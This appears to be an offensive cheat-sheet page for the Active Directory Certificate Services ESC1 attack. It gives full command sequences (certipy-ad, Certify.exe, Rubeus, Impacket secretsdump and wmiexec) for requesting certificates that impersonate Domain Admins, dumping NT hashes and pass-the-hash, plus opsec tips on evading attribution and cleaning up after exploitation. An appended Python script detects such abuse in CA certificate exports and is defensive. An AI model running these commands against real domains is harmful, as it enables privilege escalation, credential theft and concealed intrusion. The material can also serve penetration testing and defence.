ADCSESC1

ESC1: SAN abuse. Enroll in a template that carries the Client Authentication EKU and lets the enrollee supply the Subject Alternative Name, allowing impersonation of any AD user, including Domain Admins.

Applies to: Users/Computers with Enroll rights → vulnerable certificate template → Enterprise CA


Linux Abuse

certipy-ad

# Step 1: Find vulnerable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Request cert with arbitrary UPN (impersonate target)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>' \
  -upn <target-user>@<domain>

# Step 2a: With SID (required if strong cert mapping enforced)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>' \
  -upn <target-user>@<domain> \
  -sid 'S-1-5-21-<domain-sid>-<rid>'

# Step 3: Authenticate (retrieves NT hash + TGT)
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Step 4: PTH / secretsdump
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/Administrator@<dc-ip>'

Impacket (pass-the-hash after auth)

secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'
wmiexec.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'

Windows Abuse

Certify.exe + Rubeus

# Step 1: Find vulnerable templates
Certify.exe find /vulnerable

# Step 2: Request certificate with target UPN
Certify.exe request /ca:<ca-host>\<ca> /template:<template> /upn:<target-user>@<domain> /sid:S-1-5-21-<domain-sid>-<rid>

# Convert PEM to PFX (openssl on attacker box, or use Certify output); the key option is -inkey
openssl pkcs12 -in cert.pem -inkey key.pem -export -out <target-user>.pfx

# Step 3: Request TGT and inject
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /password:<pfx-password> /ptt

# Verify
klist

Opsec

  • CA stores a copy of every issued certificate in its Issued Certificates store, so defenders can identify the requesting principal and the impersonated UPN.
  • Prefer enrolling as a low-privilege account; the requesting identity is logged, not the impersonated one.
  • Clean up: the PFX and any exported certs should be deleted post-exploitation.
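The Opsec note above is also the detection angle: an ESC1 certificate shows up in the CA's Issued Certificates store as a logon-capable certificate whose SAN UPN names a different account than the one that requested it. The following triage script is an added example (not part of this page or of Certipy/Certify); the CSV field names and the decoded SAN UPN column are assumptions about how the store was exported.

```python
import csv
import io

# Constructed sample export of the CA's Issued Certificates store (not from the page).
# Field names are assumed; the SAN UPN is assumed to have been decoded from each
# issued certificate, since it is not a default certutil -view column.
ISSUED_CSV = """request_id,requester,template,eku,san_upn
1001,CORP\\jdoe,User,Client Authentication;Secure Email,jdoe@corp.local
1002,CORP\\jdoe,VulnTemplate,Client Authentication,administrator@corp.local
1003,CORP\\WS01$,Machine,Client Authentication;Server Authentication,
1004,CORP\\svc-web,WebServer,Server Authentication,administrator@corp.local
1005,CORP\\jdoe,VulnTemplate,Any Purpose,da-ops@corp.local
"""

# EKUs that let a certificate authenticate a user via PKINIT. An empty EKU list
# (no constraint at all) is treated as usable too.
CLIENT_AUTH_EKUS = {"client authentication", "pkinit client authentication",
                    "smart card logon", "any purpose"}


def account_from_requester(requester):
    """'CORP\\jdoe' or 'jdoe@corp.local' -> 'jdoe' (lower-cased sAMAccountName)."""
    return requester.split("\\")[-1].split("@")[0].lower()


def usable_for_logon(eku_field):
    """True when the EKU set allows Kerberos client authentication."""
    ekus = {e.strip().lower() for e in eku_field.split(";") if e.strip()}
    return not ekus or bool(ekus & CLIENT_AUTH_EKUS)


def find_esc1_candidates(csv_text):
    """Return (request_id, requester, san_upn, template) for every issued
    certificate whose SAN UPN names a different account than the requester
    and which can be used for logon: the signature of ESC1 abuse."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        upn = row["san_upn"].strip().lower()
        if not upn or not usable_for_logon(row["eku"]):
            continue  # no UPN SAN, or not a logon-capable certificate
        if upn.split("@")[0] != account_from_requester(row["requester"]):
            hits.append((row["request_id"], row["requester"], upn, row["template"]))
    return hits


if __name__ == "__main__":
    for request_id, requester, upn, template in find_esc1_candidates(ISSUED_CSV):
        print(f"request {request_id}: {requester} obtained a cert for {upn} via {template}")
```

Legitimate enrollment-agent or administrator-issued certificates also produce a requester/UPN mismatch, so the output is a triage list to check against the template's enrollee-supplies-subject setting, not a verdict on its own.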